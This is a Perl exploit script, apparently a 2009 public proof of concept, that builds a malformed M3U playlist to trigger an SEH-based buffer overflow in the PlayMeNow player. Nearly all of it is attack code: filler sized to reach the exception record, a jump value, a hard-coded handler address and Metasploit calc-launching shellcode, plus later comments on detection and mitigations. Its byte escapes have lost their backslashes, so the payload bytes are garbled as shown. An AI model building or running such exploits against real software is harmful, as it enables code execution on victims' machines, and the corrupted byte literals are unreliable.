# Title : PlayMeNow Malformed M3U Playlist Buffer Overflow(SEH)
# Published : 2009-12-21
# Author : ThE g0bL!N
#!/usr/bin/perl
#Greets: His0k4 :) Then His0k4 and After That His0k4
#Special Greets :01000001 01101001 01100011 01101000 01100001 00100000
##################################################################
# win32_exec - EXITFUNC=seh CMD=calc Size=158 Encoder=PexFnstenvMov http://metasploit.com
# Payload section of the generated playlist. Per the generator comment directly
# above, this is a 158-byte Metasploit win32_exec payload (CMD=calc,
# EXITFUNC=seh, PexFnstenvMov encoder), i.e. a proof-of-execution payload.
# NOTE(review): as rendered on this page the literals read "x6ax22..." with no
# backslashes, so Perl sees plain ASCII text here rather than byte escapes; the
# listing looks like it lost characters in extraction and should not be taken
# as the author's original byte sequence.
my $shellcode =
"x6ax22x59xd9xeexd9x74x24xf4x5bx81x73x13x5bx71xf9".
"x90x83xebxfcxe2xf4xa7x99xbdx90x5bx71x72xd5x67xfa".
"x85x95x23x70x16x1bx14x69x72xcfx7bx70x12xd9xd0x45".
"x72x91xb5x40x39x09xf7xf5x39xe4x5cxb0x33x9dx5axb3".
"x12x64x60x25xddx94x2ex94x72xcfx7fx70x12xf6xd0x7d".
"xb2x1bx04x6dxf8x7bxd0x6dx72x91xb0xf8xa5xb4x5fxb2".
"xc8x50x3fxfaxb9xa0xdexb1x81x9cxd0x31xf5x1bx2bx6d".
"x54x1bx33x79x12x99xd0xf1x49x90x5bx71x72xf8x67x2e".
"xc8x66x3bx27x70x68xd8xb1x82xc0x33x81x73x94x04x19".
"x61x6exd1x7fxaex6fxbcx12x98xfcx38x71xf9x90";
# Filler: the literal repeated 2360 times. Presumably sized so that the data
# following it lands on the parser's exception registration record on the
# stack -- TODO confirm the offset against the affected build.
# Detection hint: a playlist entry thousands of characters long on a single
# line is abnormal for an M3U file and is a usable triage signal.
my $bof="x42" x 2360;
# Value written over the "next record" field of the exception registration
# record (four bytes in the intended byte form -- see the note on $shellcode).
my $next_seh="xEBx06x90x90";
# Value written over the handler field of the same record. Read as a
# little-endian pointer the bytes spell 0x72C615B8, a hard-coded address;
# which module it belongs to is not stated on the page -- TODO confirm.
# A fixed handler address only works against a module loaded at a predictable
# base and not protected by SafeSEH; SafeSEH, SEHOP and ASLR are the relevant
# mitigations for this overwrite pattern.
my $seh="xB8x15xC6x72";
###################################################################
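# Append the assembled playlist entry to exploit.m3u in the current directory.
# Order written: filler, the two exception-record field values, then the payload.
# Append mode ('>>') is kept from the original, so repeated runs grow the file
# instead of replacing it.
# Three-argument open with a lexical handle keeps the mode separate from the
# file name, and each I/O step is checked so a failed open, write or close is
# reported instead of silently leaving a missing or truncated file.
open(my $playlist_fh, '>>', 'exploit.m3u')
    or die "cannot open exploit.m3u for append: $!";
print {$playlist_fh} $bof.$next_seh.$seh.$shellcode
    or die "cannot write to exploit.m3u: $!";
close($playlist_fh)
    or die "cannot close exploit.m3u: $!";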
###################################################################